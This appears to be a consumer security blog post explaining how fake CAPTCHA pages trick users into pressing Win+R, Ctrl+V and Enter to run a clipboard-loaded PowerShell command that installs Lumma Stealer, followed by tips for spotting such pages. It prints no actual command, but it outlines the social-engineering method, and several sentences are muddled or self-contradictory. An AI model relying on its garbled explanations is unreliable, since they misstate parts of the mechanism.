Seeing CAPTCHAs is often a symbol of website security, making the users feel more secure interacting with the page containing that CAPTCHA. Despite that, cybercriminals have taken advantage of that trust by building fake CAPTCHAs and tricking users into downloading malware. With this in place, the tactic works, and in this post, we shed more light on how it functions and how you can avoid being caught out when executing this sort of scam.
While some have begun using CAPTCHA to trick people into giving their services legitimacy to rogue websites, some antivirus programs noted that the attempt has failed. Unsuspecting users are led to such sites, and when they land on one, they are met with a fake CAPTCHA that looks as close as possible to the real one. This tactic lowers suspicion, as most users are used to CAPTCHA being on safe and professional sites.
Why you should be afraid of Fake CAPTCHAs
Inadvertently, the scam begins with the user looking for pirated software, such as cracked video games. This could be a site that says it has what they need. When these people try to access the content, a fake CAPTCHA appears. Once completed, they are directed to take further action, typing in particular key commands, which eventually bring malware to their computer.
The malware does not download unless the fake CAPTCHA itself, not the question the user is asked, is completed. It’s not evil; it’s a small part of a bigger scheme to defer to malicious code unknowingly. After the CAPTCHA has appeared, the user is told to press Win + R, CTRL + V, and Enter. All this is harmless enough, but it’s the last step in an ingenious malware installation.
The fake CAPTCHA takes the user’s clipboard and loads a malicious PowerShell script onto it behind the scenes. Pasting and running a command, including Lumma Stealer, begins the malware process without the user knowing it. This malware is designed to steal personal data from infected devices and bypass antivirus protections.
Spelling out how to spot and avoid fake CAPTCHAs
To avoid this trap, never unquestioningly trust a CAPTCHA, and most importantly, do so only when on a strange or suspicious website. Here are a few important tips to keep in mind:
- CAPTHAS don’t make you type things. If you see a CAPTCHA that says to press keyboard shortcuts or run some commands on your PC, take that as a red flag.
- Simple CAPTCHAs are legitimate CAPTCHAs. Typically, real CAPTCHAs will ask users to solve basic puzzles like selecting images with a particular object or matching puzzle pieces. That’s never in the form of steps that require you to open additional tools such as PowerShell.
- Be careful about pirated software sites. Illegal downloaders are the prime target of many malicious CAPTCHAs. If downloading pirated content, the best way to prevent malware infection is to avoid downloading altogether.
This is just one example of one of the new twists the cybercriminals come up with, which is why they’re never too sure when something new emerges. If you willingly put yourself in this trap, beware of the warning signs of a fake CAPTCHA:
- Stay vigilant.
- Question anything that sounds off or won’t ring a bell, and see if the CAPTCHA is appropriately out of place on the website you’re on.
- Proceed safely, and you will be better than the scammers.
These days, malware and CAPTCHAs have become incredibly dangerously intertwined, with criminals using malware to spread CAPTCHAs and vice versa. By remaining aware and up to date with these sneaky tactics, you can stay one step ahead of them and protect yourself and your devices.
Featured image credit: Furkan Demirkaya/Gencraft AI
